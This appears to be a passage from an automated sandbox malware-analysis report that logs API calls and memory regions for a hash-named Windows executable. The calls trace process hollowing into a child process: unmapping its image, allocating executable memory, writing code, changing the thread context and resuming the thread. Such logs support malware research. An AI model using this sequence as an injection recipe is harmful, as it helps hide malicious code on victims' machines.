[117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0056.618] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18c06c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18c06c*, lpNumberOfBytesRead=0x0) returned 1 [0056.619] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0056.645] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x9000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0056.646] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x215a0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x215a0*, NumberOfBytesWritten=0x0) returned 0x0 [0056.648] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x217a0*, NumberOfBytesToWrite=0x7200, NumberOfBytesWritten=0x0 | out: Buffer=0x217a0*, NumberOfBytesWritten=0x0) returned 0x0 [0056.651] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x21654*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x21654*, lpNumberOfBytesWritten=0x0) returned 1 [0056.652] SetThreadContext (hThread=0x74, lpContext=0x220000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x402f47, Ebp=0x0, Eip=0x779f01c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0056.653] ResumeThread (hThread=0x74) returned 0x1 [0056.728] CloseHandle (hObject=0x74) returned 1 [0056.728] CloseHandle (hObject=0x78) returned 1 [0056.728] ExitProcess (uExitCode=0x0) [0056.729] HeapValidate (hHeap=0x240000, dwFlags=0x0, lpMem=0x2407d0) returned 1 [0056.729] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x2407d0 | out: hHeap=0x240000) returned 1 Process: id = "2" image_name = "eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" filename = "c:\\users\\keecfmwgj\\desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" page_root = "0x478d2000" os_pid = "0xe24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe10" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 318 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 319 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 320 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 321 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 322 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 323 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 324 start_va = 0x400000 end_va = 0x781fff monitored = 1 entry_point = 0x424a10 region_type = mapped_file name = "eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\eb24b3b9375f0b3272fac6eecc9329f79eab274d802b2ad37037cc83a46fa3f1.exe") Region: id = 325 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 326 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 327 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 328 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 329 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 330 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 331 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 332 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 333 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 334 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 335 start_va = 0x210000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 336 start_va = 0x75220000 end_va = 0x7527bfff monitored = 0 entry_point = 0x7525f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 337 start_va = 0x75280000 end_va = 0x752befff monitored = 0 entry_point = 0x752ae088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 338 start_va = 0x752f0000 end_va = 0x752f7fff monitored = 0 entry_point = 0x752f20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 339 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 340 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 341 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 342 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 343 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 344 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 345 start_va = 0x290000 end_va = 0x30ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 346 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 347 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 348 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 349 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 350 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 351 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 352 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 353 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 354 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 355 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 356 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 357 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 358 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 359 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 360 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 361 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 362 start_va = 0x310000 end_va = 0x3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 363 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 364 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 365 start_va = 0x510000 end_va = 0x697fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 366 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 367 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 368 start_va = 